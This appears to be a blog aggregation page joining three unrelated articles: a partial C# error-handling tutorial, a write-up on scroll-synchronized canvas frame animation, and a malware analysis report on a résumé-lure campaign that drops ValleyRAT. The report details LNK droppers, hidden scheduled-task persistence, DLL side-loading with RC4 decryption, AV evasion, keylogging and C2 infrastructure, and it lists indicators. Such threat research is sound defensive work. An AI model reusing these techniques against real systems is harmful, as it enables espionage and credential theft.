    Nothing fancy. Ah, ConvertToString does not really exist in the .NET world, but let’s fake it!

    Third step, we need to send the string to the remote endpoint.

    OperationResult SendStringToApi(string fileContent)
    {
        using (var httpClient = new HttpClient())
        {
            httpClient.BaseAddress = new Uri("http://some-address");
    
            HttpRequestMessage message = new HttpRequestMessage();
            message.Method = HttpMethod.Post;
            message.Content = ConvertToContent(fileContent);
    
            var httpResult = httpClient.SendAsync(message).Result;
    
            if (httpResult.IsSuccessStatusCode)
                return OperationResult.Ok;
            else if (httpResult.StatusCode == System.Net.HttpStatusCode.Unauthorized)
                return OperationResult.Unauthorized;
            else return OperationResult.GenericError;
        }
    }
    

    We use the native HttpClient .NET class to send our string to the remote endpoint, and then we fetch the result and map it to an enum, OperationResult.

    Hey, have you noticed it? I used an asynchronous method in a synchronous one using httpClient.SendAsync(message).Result. But it’s the wrong way to do it! If you want to know more, head to my article First steps with asynchronous programming in C#

    Finally, the main method.

    void Main()
    {
        (bool fileExists, Stream fileStream) = ReadDataFromFile("C:\some-path");
        if (fileExists)
        {
            string fileContent = ConvertStreamIntoString(fileStream);
            if (!string.IsNullOrWhiteSpace(fileContent))
            {
                var operationResult = SendStringToApi(fileContent);
                if (operationResult == OperationResult.Ok)
                {
                    Console.WriteLine("Yeah!");
                }
                else
                {
                    Console.WriteLine("Not able to complete the operation");
                }
            }
            else
            {
                Console.WriteLine("The file was empty");
            }
        }
        else
        {
            Console.WriteLine("File does not exist");
        }
    }
    

    Quite hard to understand, right? All those if-else do not add value to our code. We don’t manage errors in an alternate way, we just write on console that something has gone wrong. So, we can improve it by removing all those else blocks.

    void Main()
    {
        (bool fileExists, Stream fileStream) = ReadDataFromFile("C:\some-path");
        if (fileExists)
        {
            string fileContent = ConvertStreamIntoString(fileStream);
            if (!string.IsNullOrWhiteSpace(fileContent))
            {
                var operationResult = SendStringToApi(fileContent);
                if (operationResult == OperationResult.Ok)
                {
                    Console.WriteLine("Yeah!");
                }
            }
        }
    }
    

    A bit better! It definitely looks like the code I used to write. But we can do more. 💪

    A better way

    Let’s improve each step.

    Take the ReadDataFromFile method. The boolean value returned in the tuple is a flag and should be removed. How? Time to create a custom exception.

    How to call this exception? DataReadException? FileSystemException? Since we should think of the needs of the caller, not the method itself, a good name could be DataTransferException.

    Stream ReadDataFromFile(string filePath)
    {
        try
        {
            Stream stream = ReadFromFileSystem(filePath);
            if (stream != null && stream.Length > 0) return stream;
            else throw new DataTransferException($"file {filePath} not found or invalid");
        }
        catch (DataTransferException ex) { throw; }
        catch (Exception ex)
        {
            new DataTransferException($"Unable to get data from {filePath}", ex);
        }
    }
    

    We can notice 3 main things:

    1. we don’t check anymore if the filePath value is null, because we will always pass a valid string (to avoid null values as input parameters);
    2. if the stream is invalid, we throw a new DataTransferException exception with all the info we need;
    3. since we don’t know if the native classes to interact with file system will change and throw different exceptions, we wrap every error into our custom DataTransferException.

    Here I decided to remove the boolean value because we don’t have an alternate way to move on with the operations. If we had a fallback way to retrieve the stream (for example from another source) we could have kept our tuple and perform the necessary checks.

    The ConvertStreamIntoString does not so much, it just calls another method. If we have control over that ConvertToString we can handle it like we did with ReadDataFromFile. We can observe that we don’t need to check if the input stream is valid because we have already done in the ReadDataFromFile method.

    Time to update our SendStringToApi!

    Since we’re using an external class to perform HTTP requests (the native HttpClient), we’ll wrap our code into a try-catch-block and throw only exceptions of type DataTransferException; and since we don’t actually need a result, we can return void instead of that OperationResult enum.

    void SendStringToApi(string fileContent)
    {
        HttpClient httpClient = null;
        try
        {
            httpClient = new HttpClient();
            httpClient.BaseAddress = new Uri("http://some=address");
    
            HttpRequestMessage message = new HttpRequestMessage();
            message.Method = HttpMethod.Post;
            message.Content = ConvertToContent(fileContent);
            var httpResult = httpClient.SendAsync(message).Result;
    
            httpResult.EnsureSuccessStatusCode();
        }
        catch (Exception ex)
        {
            throw new DataTransferException("Unable to send data to the endpoint", ex);
        }
        finally
        {
            httpClient.Dispose();
        }
    }
    

    Now we can finally update our Main method and remove all that clutter that did not bring any value to our code:

    void Main()
    {
        try
        {
            Stream fileStream = ReadDataFromFile("C:\some-path");
            string fileContent = ConvertStreamIntoString(fileStream);
            SendStringToApi(fileContent);
            Console.WriteLine("Yeah!");
        }
        catch (DataTransferException dtex)
        {
            Console.WriteLine($"Unable to complete the transfer: {dtex.Message}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"An error occurred: {ex.Message}");
        }
    }
    

    Finally, someone who reads our code has a clear idea of what’s going on, and how information pass through one step or another.

    Much better, isn’t it?

    Wrapping up

    We’ve seen that writing good error handling is not as easy as it seems. You must consider a lot of things, like

    • choosing if using only exceptions or rely also on status codes
    • define which exceptions a method should throw and which ones it should catch (you can use TDD to plan for them easily)

    Also, remember that

    • external libraries may change or may be cumbersome, so you’d better wrap external classes into custom ones
    • exceptions should be client-oriented, to help callers understand what’s going on without unnecessary details

    Happy coding!



    Source link

  • Creating Smooth Scroll-Synchronized Animation for OPTIKKA: From HTML5 Video to Frame Sequences

    Creating Smooth Scroll-Synchronized Animation for OPTIKKA: From HTML5 Video to Frame Sequences



    When OPTIKKA—a creative orchestration platform transforming traditional design workflows into intelligent, extensible systems—came to us at Zajno, we quickly defined a core visual metaphor: a dynamic, visually rich file system that expands as you scroll. Throughout design and development, we explored multiple iterations to ensure the website’s central animation was not only striking but also seamless and consistent across all devices.

    In this article, we’ll explain why we moved away from using HTML5 video for scroll-synchronized animation and provide a detailed guide on creating similar animations using frame sequences.

    The Initial Approach: HTML5 Video

    Why It Seemed Promising

    Our first idea was to use HTML5 video for the scroll-triggered animation, paired with GSAP’s ScrollTrigger plugin for scroll tracking. The approach had clear advantages:

    // Initial approach with video element
    
    export default class VideoScene extends Section {
      private video: HTMLVideoElement;
      private scrollTrigger: ScrollTrigger;
      setupVideoScroll() {
        this.scrollTrigger = ScrollTrigger.create({
          trigger: '.video-container',
          start: 'top top',
          end: 'bottom bottom',
          scrub: true,
          onUpdate: (self) => {
            // Synchronize video time with scroll progress
    
            const duration = this.video.duration;
            this.video.currentTime = self.progress * duration;
          },
        });
      }
    }
    • Simplicity: Browsers support video playback natively.
    • Compactness: One video file instead of hundreds of images.
    • Compression: Video codecs efficiently reduce file size.

    In reality, this approach had significant drawbacks:

    • Stuttering and lag, especially on mobile devices.
    • Autoplay restrictions in many browsers.
    • Loss of visual fidelity due to compression.

    These issues motivated a shift toward a more controllable and reliable solution.

    Transition to Frame Sequences

    What Is a Frame Sequence?

    A frame sequence consists of individual images played rapidly to create the illusion of motion—much like a film at 24 frames per second. This method allows precise control over animation timing and quality.

    Extracting Frames from Video

    We used FFmpeg to convert videos into individual frames and then into optimized web formats:

    1. Take the source video.
    2. Split it into individual PNG frames.
    3. Convert PNGs into WebP to reduce file size.
    // Extract frames as PNG sequence
    
    console.log('🎬 Extracting PNG frames...');
    await execPromise(`ffmpeg -i "video/${videoFile}" -vf "fps=30" "png/frame_%03d.png"`);
    // Convert PNG sequence to WebP
    
    console.log('🔄 Converting to WebP sequence...');
    await execPromise(`ffmpeg -i "png/frame_%03d.png" -c:v libwebp -quality 80 "webp/frame_%03d.webp"`);
    console.log('✅ Processing complete!');

    Device-Specific Sequences

    To optimize performance across devices, we created at least two sets of sequences for different aspect ratios:

    • Desktop: Higher frame count for smoother animation.
    • Mobile: Lower frame count for faster loading and efficiency.
    // New image sequence based architecture
    
    export default abstract class Scene extends Section {
      private _canvas: HTMLCanvasElement;
      private _ctx: CanvasRenderingContext2D;
      private _frameImages: Map<number, HTMLImageElement> = new Map();
      private _currentFrame: { contents: number } = { contents: 1 };
      // Device-specific frame configuration
    
      private static readonly totalFrames: Record<BreakpointType, number> = {
        [BreakpointType.Desktop]: 1182,
        [BreakpointType.Tablet]: 880,
        [BreakpointType.Mobile]: 880,
      };
      // Offset for video end based on device type
    
      private static readonly offsetVideoEnd: Record<BreakpointType, number> = {
        [BreakpointType.Desktop]: 1500,
        [BreakpointType.Tablet]: 1500,
        [BreakpointType.Mobile]: 1800,
      };
    }

    We also implemented dynamic path resolution to load the correct image sequence depending on the user’s device type.

    // Dynamic path based on current breakpoint
    
    img.src = `/${this._currentBreakpointType.toLowerCase()}/frame_${paddedNumber}.webp`;

    Intelligent Frame Loading System

    The Challenge

    Loading 1,000+ images without blocking the UI or consuming excessive bandwidth is tricky. Users expect instantaneous animation, but heavy image sequences can slow down the site.

    Stepwise Loading Solution

    We implemented a staged loading system:

    1. Immediate start: Load the first 10 frames instantly.
    2. First-frame display: Users see animation immediately.
    3. Background loading: Remaining frames load seamlessly in the background.
    await this.preloadFrames(1, countPreloadFrames);
    this.renderFrame(1);
    this.loadFramesToHash();

    Parallel Background Loading

    Using a ParallelQueue system, we:

    • Load remaining frames efficiently without blocking the UI.
    • Start from a defined countPreloadFrames to avoid redundancy.
    • Cache each loaded frame automatically for performance.
    // Background loading of all frames using parallel queue
    
    private loadFramesToHash() {
      const queue = new ParallelQueue();
    
      for (let i = countPreloadFrames; i <= totalFrames[this._currentBreakpointType]; i++) {
        queue.enqueue(async () => {
          const img = await this.loadFrame(i);
          this._frameImages.set(i, img);
        });
      }
    
      queue.start();
    }

    Rendering with Canvas

    Why Canvas

    Rendering frames in an HTML <canvas> element offered multiple benefits:

    • Instant rendering: Frames load into memory for immediate display.
    • No DOM reflow: Avoids repainting the page.
    • Optimized animation: Works smoothly with requestAnimationFrame.
    // Canvas rendering with proper scaling and positioning
    private renderFrame(frameNumber: number) {
      const img = this._frameImages.get(frameNumber);
      if (img && this._ctx) {
        // Clear previous frame
        this._ctx.clearRect(0, 0, this._canvas.width, this._canvas.height);
    
        // Handle high DPI displays
        const pixelRatio = window.devicePixelRatio || 1;
        const canvasRatio = this._canvas.width / this._canvas.height;
        const imageRatio = img.width / img.height;
    
        // Calculate dimensions for object-fit: cover behavior
        let drawWidth = this._canvas.width;
        let drawHeight = this._canvas.height;
        let offsetX = 0;
        let offsetY = 0;
    
        if (canvasRatio > imageRatio) {
          // Canvas is wider than image
          drawWidth = this._canvas.width;
          drawHeight = this._canvas.width / imageRatio;
        } else {
          // Canvas is taller than image
          drawHeight = this._canvas.height;
          drawWidth = this._canvas.height * imageRatio;
          offsetX = (this._canvas.width - drawWidth) / 2;
        }
        // Draw image with proper scaling for high DPI
        this._ctx.drawImage(img, offsetX, offsetY, drawWidth / pixelRatio, drawHeight / pixelRatio);
      }
    }

    Limitations of <img> Elements

    While possible, using <img> for frame sequences presents issues:

    • Limited control over scaling.
    • Synchronization problems during rapid frame changes.
    • Flickering and inconsistent cross-browser rendering.
    // Auto-playing loop animation at the top of the page
    
    private async playLoop() {
      if (!this.isLooping) return;
      const startTime = Date.now();
      const animate = () => {
        if (!this.isLooping) return;
        // Calculate current progress within loop duration
    
        const elapsed = (Date.now() - startTime) % (this.loopDuration * 1000);
        const progress = elapsed / (this.loopDuration * 1000);
        // Map progress to frame number
    
        const frame = Math.round(this.loopStartFrame + progress * this.framesPerLoop);
        if (frame !== this._currentFrame.contents) {
          this._currentFrame.contents = frame;
    
          this.renderFrame(this._currentFrame.contents);
        }
        requestAnimationFrame(animate);
      };
      // Preload loop frames before starting animation
    
      await this.preloadFrames(this.loopStartFrame, this.loopEndFrame);
      animate();
    }

    Loop Animation at Page Start

    Canvas also allowed us to implement looping animations at the start of the page with seamless transitions to scroll-triggered frames using GSAP.

    // Smooth transition between loop and scroll-based animation 

    // Background loading of all frames using parallel queue
    private handleScrollTransition(scrollProgress: number) {
      if (this.isLooping && scrollProgress > 0) {
        // Transition from loop to scroll-based animation
    
        this.isLooping = false;
        gsap.to(this._currentFrame, {
          duration: this.transitionDuration,
          contents: this.framesPerLoop - this.transitionStartScrollOffset,
          ease: 'power2.inOut',
          onComplete: () => (this.isLooping = false),
        });
      } else if (!this.isLooping && scrollProgress === 0) {
        // Transition back to loop animation
    
        this.preloadFrames(this.loopStartFrame, this.loopEndFrame);
        this.isLooping = true;
        this.playLoop();
      }
    }

    Performance Optimizations

    Dynamic Preloading Based on Scroll Direction

    We enhanced smoothness by preloading frames dynamically according to scroll movement:

    • Scroll down: Preload 5 frames ahead.
    • Scroll up: Preload 5 frames behind.
    • Optimized range: Only load necessary frames.
    • Synchronized rendering: Preloading happens in sync with the current frame display.
    // Smart preloading based on scroll direction
    
    _containerSequenceUpdate = async (self: ScrollTrigger) => {
      const currentScroll = window.scrollY;
      const isScrollingUp = currentScroll < this.lastScrollPosition;
      this.lastScrollPosition = currentScroll;
      // Calculate adjusted progress with end offset
    
      const totalHeight = document.documentElement.scrollHeight - window.innerHeight;
    
      const adjustedProgress = Math.min(1, currentScroll / (totalHeight - offsetVideoEnd[this._currentBreakpointType]));
      // Handle transition between states
    
      this.handleScrollTransition(self.progress);
      if (!this.isLooping) {
        const frame = Math.round(adjustedProgress * totalFrames[this._currentBreakpointType]);
        if (frame !== this._currentFrame.contents) {
          this._currentFrame.contents = frame;
          // Preload frames in scroll direction
    
          const preloadAmount = 5;
          await this.preloadFrames(
            frame + (isScrollingUp ? -preloadAmount : 1),
            frame + (isScrollingUp ? -1 : preloadAmount)
          );
          this.renderFrame(frame);
        }
      }
    };

    Results of the Transition

    Benefits

    • Stable performance across devices.
    • Predictable memory usage.
    • No playback stuttering.
    • Cross-platform consistency.
    • Autoplay flexibility.
    • Precise control over each frame.

    Technical Trade-offs

    • Increased bandwidth due to multiple requests.
    • Larger overall data size.
    • Higher implementation complexity with caching and preloading logic.

    Conclusion

    Switching from video to frame sequences for OPTIKKA demonstrated the importance of choosing the right technology for the task. Despite added complexity, the new approach provided:

    • Reliable performance across devices.
    • Consistent, smooth animation.
    • Fine-grained control for various scenarios.

    Sometimes, a more technically complex solution is justified if it delivers a better user experience.



    Source link

  • Operation Silk Lure: Scheduled Tasks Weaponized for DLL Side-Loading (drops ValleyRAT)

    Operation Silk Lure: Scheduled Tasks Weaponized for DLL Side-Loading (drops ValleyRAT)


    Authors: Dixit Panchal, Soumen Burma & Kartik Jivani

    Table of Contents

    • Introduction:
    • Initial Analysis:
      • Analysis of Decoy:
      • Infection Chain:
    • Technical Analysis:
    • Infrastructure Hunting:
    • Conclusion:
    • Seqrite Coverage:
    • IoCs:
    • MITRE ATT&CK:

    Introduction:

    Seqrite Lab has been actively monitoring global cyber threat activity and has recently uncovered an ongoing campaign leveraging a Command and Control (C2) infrastructure hosted in the United States. The threat actors behind this operation are specifically targeting Chinese individuals seeking employment opportunities in the FinTech, cryptocurrency exchange, and trading platform sectors—particularly for engineering and technical roles.

    This campaign primarily employs sophisticated spear-phishing techniques. The adversaries craft highly targeted emails impersonating job seekers and send them to HR departments and technical hiring teams within Chinese firms. These emails often contain malicious .LNK (Windows shortcut) files embedded within seemingly legitimate résumés or portfolio documents. When executed, these .LNK files act as droppers, initiating the execution of payloads that facilitate initial compromise.

    Initial Analysis:

    Upon detailed analysis of the campaign, it was observed that the deployed malware establishes persistence within the compromised system and initiates various reconnaissance operations. These include capturing screenshots, harvesting clipboard contents, and exfiltrating critical system metadata. The collected data is covertly transmitted to a remote Command and Control (C2) server under the control of the threat actors. This exfiltrated information significantly elevates the risk of advanced cyber-espionage, identity theft, and credential compromise, thereby posing a serious threat to both organizational infrastructure and individual privacy.

    Analysis of Decoy:

    Basically, The PDF is a Chinese-language résumé for 李汉兵 (Li Hanbing), a senior backend / blockchain full-stack engineer (Java + Solidity) with experience building high-throughput trading systems and DeFi/smart-contract projects. It lists a bachelor’s degree from 华南农业大学 – South China Agricultural University (2008–2012), work history in 惠州 and 深圳 (Guangdong province) including founder/tech-lead roles, and many crypto/DeFi and high-concurrency trading system projects. The CV emphasizes Spring Cloud microservices, RocketMQ, MySQL, Solidity/Hardhat, and production experience for trading exchanges and DeFi protocols (TVL and customer counts are claimed).

    Evidence locating origin / country:

    • Language: the entire document is written in Simplified Chinese — typical for mainland China.
    • University: 华南农业大学 (South China Agricultural University)— a university located in Guangdong, China.
    • Work locations / companies: the CV mentions 惠州 (Huizhou) and 深圳 (Shenzhen) — both cities in Guangdong province, PRC. Company names like “惠州智灰兔科技有限公司 (Huizhou Zhihuitu Technology Co., Ltd.)” and “惠州市睿思通网络科技有限公司 (Huizhou Ruisitong Network Technology Co., Ltd.)” point to Chinese companies.
    • Platform reference: the file title in the PDF metadata/first line shows “拉勾网” — a Chinese tech job board (Lagou). That strongly suggests the résumé was created for/posted on a mainland-China recruiting platform.

    The resume is localized and credible for Chinese targets: Chinese language, Chinese universities, and local company names make it believable to Chinese users. That increases the chance a user will open it (social engineering).

    Infection Chain:

    Technical Analysis:

    During initial static analysis of the downloaded shortcut 李汉彬.lnk, we observed more than 260-character sequences consistent with a PowerShell command-line payload. The command appears to reference a target file path (see snapshot), suggesting the LNK acts as a dropper/execution vector for a subsequent PowerShell-based stage.

    During initial analysis and parsing of the code, we discovered the following notable indicators: the sample appears capable of downloading additional files (see snapshot).

    The sample connects to pan.tenire.com and downloads additional artifacts, including a decoy resume document, keytool.exe, CreateHiddenTask.vbs, and jli.dll.

    When we executed the sample LNK in our secure environment, it downloaded a second-stage payload to C:\Users\<user>\AppData\Roaming\Security and executed it.

    Additionally, the malware deploys a scheduled task via the CreateHiddenTask.vbs script. This task is designed to execute keytool.exe every day at 8:00 AM, ensuring persistence and regular execution of the malicious payload.

    The VBScript instantiates COM objects (WScript.Shell, Schedule.Service, Scripting.FileSystemObject), connects to the Task Scheduler, and programmatically creates a daily scheduled task named “Security” (trigger type = daily, StartBoundary = 2025-08-01T08:01:01, DaysInterval = 1) whose action executes %APPDATA%\Security\keytool.exe (constructed via ExpandEnvironmentStrings); it also sets the task registration metadata to Author = “Microsoft Corporation” (likely spoofing a benign author) and, after registering the task in the root folder, deletes the VBScript file itself to reduce forensic traces—effectively providing persistent, scheduled execution of the dropped payload.

    Analysis of Keytool and Jli.dll

    Upon analyzing keytool.exe we found that it is calling different export funtion of Jli.dll like JLI_CmdToArgs, JLI_GetStdArgc, JLI_GetStdArgs etc as shown in below fig.

    Upon analysing the loader  Jli.dll  we found that this loader quietly opens its own executable (keytool.exe), reads a specific region derived from the PE headers, and scans that region for a distinct 8-byte marker sequence: 1C 3B 7E FF 1C 3B 7E FF. Once it finds the marker, everything after it is copied into a buffer and treated as an encrypted payload. The function then constructs a 256-byte S-box and runs the standard RC4 routine: a KSA (key scheduling) seeded with the ASCII key “123cba”, followed by the PRGA (keystream generation) which XORs the keystream with the copied bytes to produce the decrypted payload.

    Inside Keytool.exe there is an encrypted shellcode payload — i.e. the malicious code is hidden and scrambled so that static analysis won’t detect it immediately.

    Once the shellcode is decrypted (at runtime, in memory), it reveals its built‑in command‑and‑control (C2) server address: 206.119.175.16.

    After decryption the routine calls a set of helper functions that appear to prepare and launch the payload (likely by creating or duplicating a process/handle and injecting or executing the decrypted data), performs a few process-related housekeeping calls, and finally waits on a handle to synchronize execution. In short: it’s a compact self-extracting loader — marker-based extraction + RC4 decryption using a fixed key — that drops an in-memory payload and then triggers its execution while waiting for completion.

    Analysis of 2nd Payload (ValleyRAT)

    Upon our analysis, we found the 2nd payload file, we found that it contains code of ValleyRAT.

    System fingerprinting

    It collects CPU info, username, screen resolution, port number, uptime, NIC details, MAC, locale, VM check, registry values, and other identifiers.

    Function One-line Purpose Notes
    sub_1000BAD5 Opens HKLM\\…\\Tds\\tcp, reads PortNumber DWORD and appends its decimal + \\r\\n. reads of …\\Tds\\tcp\\PortNumber.
    sub_1000BB8B Reads GetTickCount() and appends formatted uptime (days/hours/minutes) + \\r\\n. Simple uptime fingerprint; benign but useful for reconnaissance.
    sub_1000BC16 Enumerates HKCU\\Software\\Tencent\\Plugin\\VAS subkeys (6–11 chars) or scans user folder for numeric directory names; appends space-separated results + \\r\\n. Fingerprints QQ/Tencent accounts or numeric IDs; detect enumeration of that Tencent key or folder scans for numeric dir names.
    sub_1000BEEE Uses NetBIOS (NCBENUM/NCBRESET/NCBASTAT) to obtain NIC MAC, formats XX-XX-… and appends + \\r\\n. Legacy NetBIOS calls to read MAC — uncommon in modern apps; monitor NetBIOS NCB usage.
    sub_1000C07D Attempts to read primary NIC DriverDesc from device-class registry and append it + \\r\\n.
    Maps GetSystemDefaultUILanguage() to a stored locale string and appends it + \\r\\n (locale fingerprinting) Checks whether the UI language is Taiwanese, Mainland Chinese, Hong Kong, Singapore, Macau, or English (US/UK)

    Anti-Vm Tricks

    Valleyrat malware checks for virtualization by looking for VirtualBox/VMware processes or the VMware registry key.

    AV Evasion

    It leverages COM/WMI to query ROOT\SecurityCenter2 for AntiVirusProduct, executes SELECT * FROM AntiVirusProduct, retrieves each displayName, and then converts/normalizes the results.
    Afterward, it invokes the function to locate and uninstall the detected AV products.

    Kill AV network connections

    This function repeatedly queries the system’s TCP connection table using dynamically resolved APIs.
    It identifies processes associated with “360Safe”, “kingsoft”, or “Huorong” by checking the owning process path.
    If a match is found, it forcefully terminates their TCP connections by setting the state to DELETE_TCB.
    Overall, it’s an anti-AV routine designed to disrupt security software’s network activity. Shown in below fig.

    Exfiltration Activities through command

    The variant is designed to capture visual user activity (screenshots/recording) and to deliver and install plugins or other malicious payloads on the victim machine.

    These are some commands

    Offset (Opcode) Description
    0x78 (120) Save IP list
    0x7B (123) Session/HWID
    0x7D (125) File/transfer handler
    0x83 (131) Plugin update (216-byte header)
    0x84 (132) Plugin install/add
    0x85 (133) Filter management
    0x86 (134) Screenshot config
    0x87 (135) Clipboard config
    0x88 (136) Keylogger control
    0x89 (137) Recording / cleanup
    0x8A (138) BoxedApp SDK init
    0xA1 (161) Format/route frame
    0xA2 (162) Self-uninstall
    0xA4 (164) Group/Remark strings
    0xA5 (165) Info sync
    0xA6 (166) UI “OK”
    0xA7 (167) Console profile
    0xC8 (200) Transport/socket setup

     

    Malware’s keylogging capability

    It prepares the logging environment by creating a dedicated directory and log file (Regedit.log) under ProgramData, performing simple log rotation if the file grows too large, and initializing a DirectInput keyboard device to capture keystrokes with a buffered input model. It also records the Caps Lock state at startup to ensure accurate key interpretation.

    System reconnaissance routine

    Valleyrat has a system environment survey routine that collects host information by probing registry keys, security settings, file paths, and custom driver handles.
    It sets a series of feature flags (a1[26..39]) indicating things like UAC mode, AV/driver presence, keylogger/clipboard/screenshot toggles, and single-instance mutex status.
    It helps the malware decide which features to enable, what protections exist, and whether it’s already running. that indicate features such as UAC mode, AV/driver presence, keylogger/clipboard/screenshot toggles, as well as

    Index What it checks How it checks Meaning when set (=1)
    a1[26] IE config present for current user Reads HKCU\Software\Microsoft\Internet Explorer (via sub_10009F0E) IE settings value exists (string ptr non-null)
    a1[27] Ability to open SECURITY hive RegOpenKeyExW(HKLM, “SECURITY”, KEY_READ …)`
    a1[28] UAC secure desktop prompt enabled HKLM\…\Policies\System\PromptOnSecureDesktop == 1 Secure Desktop for elevation prompts is ON
    a1[29] 360 HVM service autostart HKLM\SYSTEM\ControlSet001\Services\360Hvm\Start Value == 1 (system/auto start) ⇒ 360 driver/service present
    a1[30] OS string contains “Windows” Fills buffer via sub_1000B109, searches wcsstr(…,”Windows”) Host OS looks like Windows
    a1[31] Custom device handle exists CreateFileW(“\\\\.\\kcuf063Gate”, …) Can open that device (likely a rootkit/driver comms gate)
    a1[32] “KEYLOG” feature toggle  “%APPDATA%\\A686911000006E”, “KEYLOG”) Keylogging folder/key present/enabled
    a1[33] “clipboarddata” feature toggle Same path lookup with “clipboarddata” Clipboard capture enabled
    a1[34] “picshotdata” feature toggle Same path lookup with “picshotdata” Screen/webcam snapshot enabled
    a1[35] VM path byte/flag Builds %APPDATA%\A686911000006E\vmpath, parses via sub_1000CF52/sub_1000AA91 Extracted byte set and copied to a global + this flag
    a1[36] “Recording” subkey exists Opens %APPDATA%\A686911000006E\Recording in HKCU Recording config present
    a1[37] Single-instance mutex present CreateMutexW(“Global\\A2F1A73B-…E754C”), checks GetLastError()==ERROR_ALREADY_EXISTS Another instance is running (or it marks itself as such)
    a1[38] Filter rules enabled Checks %APPDATA%\A686911000006E\FILTER\keyword or …\FILTER\netaddr against “0” Any non-“0” ⇒ filters active
    a1[39] “stop” kill-switch Reads %APPDATA%\A686911000006E\FILTER\stop into v18 Non-zero byte ⇒ stop/disable behavior

    Infrastructure Hunting:

    Upon analysing the C2 infrastructure, we discovered that it is hosted by SONDERCLOUDLIMITED (SonderCloud Limited). Additionally, several associated domains resolve to IP addresses located in the HK. All identified domains use the. work TLD and are actively being utilized by threat actors.

    In addition to the pan.tenire.com domain used to deliver the résumé decoy and malicious payloads, we identified a broader infrastructure cluster on 206.119.175.162 (AS133199, SonderCloud Limited, Hong Kong). At more then 20+ sibling domains (app.jinanjinyu.work, app.maitangou.work, app.jiangsuzhaochu.work, app.rongxingu.work, app.xinrendu.work, app.owps.work, app.awps.work) were observed pointing to the same IP. The consistent naming convention (app.*.work) and use of the .work TLD strongly suggest these were intended to impersonate job portals or work applications, fitting neatly with the résumé-themed lure. This indicates a deliberate effort to build a thematic, resilient infrastructure set supporting Operation Silk Lure.

    Conclusion: Why Operation Silk Lure?

    “Silk” = China-related footprint, and “Lure” = the résumé decoy used to entice victims.

    We named this campaign Operation Silk Lure: Scheduled Tasks Weaponized for DLL Side-Loading because each element of the label maps directly to observable, evidence-backed TTPs: “Silk” signals the campaign’s China-centric footprint (a Simplified-Chinese résumé decoy, hosting and DNS activity on Tencent Cloud/DNSPod and Chinese-pinyin domain names), “Lure” calls out the social-engineering vector (a believable CV used to trick developers, recruiters and HR into opening the file), “Scheduled Tasks” points to the persistence mechanism we recovered (a dropped CreateHiddenTask.vbs that registers a daily Task Scheduler job named Security), and “DLL Side-Loading” highlights the post-execution technique (a keytool.exe loader that side-loads a malicious DLL).

    The name is intentionally descriptive and non-speculative — every token corresponds to an observed artifact or behavior — and is therefore immediately actionable for defenders hunt for pan.tenire.com DNS queries and -NoP -ep Bypass PowerShell commandlines, %APPDATA%\Security\* artifacts, the Security scheduled task, and anomalous ImageLoad events tied to keytool.exe.

    Seqrite Coverage:

    • Ghanarava.17599037699ce501
    • Trojan.50027.GC
    • Trojan.50026.GC

    IoCs:

    MD5 File Name
    6ea9555f1874d13246726579263161e8 CreateHiddenTask.vbs
    f5b9ad341ccfe06352b8818b90b2413e 李汉彬.lnk
     

    83b341a1caab40ad1e7adb9fb4a8b911

    83b341a1caab40ad1e7adb9fb4a8b911.zip
    3ca440a3f4800090ee691e037a9ce501 jli.dll
    e94e7b953e67cc7f080b83d3a1cdcb1f keytool.exe

     

    C2:

    MITRE ATT&CK:

    Initial Access T1566.001 Spearphishing Attachment
    Execution T1059.001 Command and Scripting Interpreter: PowerShell
    T1059.005 Command and Scripting Interpreter: Visul Basic
    T1053.005 Scheduled Task/Job: Scheduled Task
    T1204.002 User Execution: Malicious File
    Persistence T1053.005 Scheduled Task/Job: Scheduled Task
    T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    Privilege Escalation T1055.001 Process Injection: Dynamic-link Library Injection
    T1055.002 Process Injection: Portable Executable Injection
    Defense Evasion T1140 Deobfuscate/Decode Files or Information
    T1574.001 Hijack Execution Flow: DLL
    T1070.004 Indicator Removal: File Deletion
    T1070.009 Indicator Removal: Clear Persistence
    T1036.008 Masquerading: Masquerade File Type
    T1112 Modify Registry
    T1027.009 Obfuscated Files or Information: Embedded Payloads
    T1027.010 Obfuscated Files or Information: Command Obfuscation
    T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
    T1055.001 Process Injection: Dynamic-link Library Injection
    T1497.001 Virtualization/Sandbox Evasion: System Checks
    T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks
    Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers
    T1056.001 Input Capture: Keylogging
    T1056.002 Input Capture: GUI Input Capture
    T1556.004 Modify Authentication Process: Network Device Authentication
    Discovery T1083 File and Directory Discovery
    Data Collection T1115 Clipboard Data
    T1005 Data from Local System
    T1039 Data from Network Shared Drive
    T1113 Screen Capture
    Command and Control T1071.001 Application Layer Protocol: Web Protocols
    Exfiltration T1041 Exfiltration Over C2 Channel

     



    Source link